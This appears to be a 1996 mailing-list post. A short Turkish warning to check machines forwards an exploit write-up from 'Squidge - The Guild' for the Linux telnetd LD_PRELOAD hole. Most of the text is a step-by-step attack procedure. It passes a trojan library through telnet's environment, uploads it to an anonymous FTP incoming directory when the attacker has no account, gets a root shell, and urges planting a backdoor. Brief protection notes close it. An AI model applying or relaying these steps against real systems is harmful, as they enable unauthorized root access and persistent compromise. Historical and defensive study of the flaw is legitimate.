On Sat, 24 Aug 1996, Gorkem Cetin wrote:
> Selam,
> Asagidaki linux telnetd hatasi linux makinalarin
> %90'inda karsida hesap olmasa da root access saglayabiliyor.. SunOS icin
> de derlenmis durumda..
> Makinalariniz kontrol ediniz..
> Iyi calismalar,
> Gorkem.
>
>
>
> Gday. This makefile produces a library, which when specified when initiating
> a telnet session allows you to start a root shell when connecting to the
> machine.
>
> To compile this, type make all. This will compile all the files, produce a
> library from the object code and name it XXXXXX.
>
> You then need to open a telnet connection to the machine where this library
> resides.
>
> -- -- -- -- --
>
> mine% telnet
> telnet> env def LD_PRELOAD /tmp/XXXXX
> telnet> o
> (to) target.machine
>
> Trying xxx.xxx.xxx.xxx
> Connected to xxxxxxxx.
> Escape character is '^]'.
>
> Linux 1.2.13
>
> login: jruser
> Squidge - The Guild presents you with a setuid 0 shell
> bash#
>
> -- -- -- -- --
>
> NOTES:
> The library you compiled *must* be on the machine you are trying to
> break into. If you have an account, make it there and set the LD_PRELOAD
> path to point to it in your homedir. If you have no account, try putting it
> in incoming with ftp. The resultant path will be
> /home/ftp/incoming/XXXXXX
>
> If you have any problems email me at squidge@onyx.infonexus.com
>
> ERRATA:
> At the moment, this only works for ELF machines. Support for a.out
> will be added shortly.
>
> Squidge - The Guild
> onyx.infonexus.com onyx.infonexus.com onyx.infonexus.com onyx.infonexus.com
>
> METHOD:
>
> Method One (If you have an account on the machine you want root on. Try this
> first.)
>
> (1) gunzip and untar the source into a directory, eg /home/squidge/XXXXXX
> (2) compile the programs by typing make all
> (3) wait
> (4) you will have a file /tmp/
> (5) type telnet
> (6) at the telnet> prompt, type env def LD_PRELOAD /tmp/XXXXX
> This tells telnet to pass the environment variable LD_PRELOAD to the
> target machine. LD_PRELOAD points to our trojan library.
> (7) type open localhost
> (8) If you don't get a prompt bash#, but get login: type something like test
> You should now be greeted with bash#. Type id and see you are root.
> Note that telnetd will time you out, so make some attempt at a backdoor.
>
> Method Two (If you have no account on the target machine)
>
> (1) as above
> (2) as above, if you are running the same hardware as the target. If you are
> on different processors, try compiling on a different machine. If you
> know what you are doing, try changing the target architecture used by
> gcc and ld. it is the -m flag with ld.
> (3) assuming you have the correct binary, open an ftp connection to the
> target
> (4) using bin mode, upload your trojan library to the targets incoming
> directory.
> (5) switch back to your machine, start telnet and specify the path of the
> targets ftp directory as your LD_PRELOAD. On linux this is normally
> /home/ftp/incoming. On others generally /var/ftp/incoming or
> /etc/ftp/incoming.
> (6) as number 8 above.
>
> If you opt for method 2, you will need a pretty good idea of what is going
> on. It is not for the fainthearted. If demand is high, I may release a new
> set of .o files for different architectures. There should be no need. I can
> compile for Sun(SPARC), M68 and x86 on my linux box. So can you.
>
> HOW TO PROTECT:
> There are a few ways. If you have a statically linked login, then you are
> safe. setuid programs ignore LD_PRELOAD so one you have logged in, you
> cannot subvert the system.
>
> You can patch telnetd to wipe all but a few env variables. There are many
> widely pieces of available code to demonstrate this.
>
>
>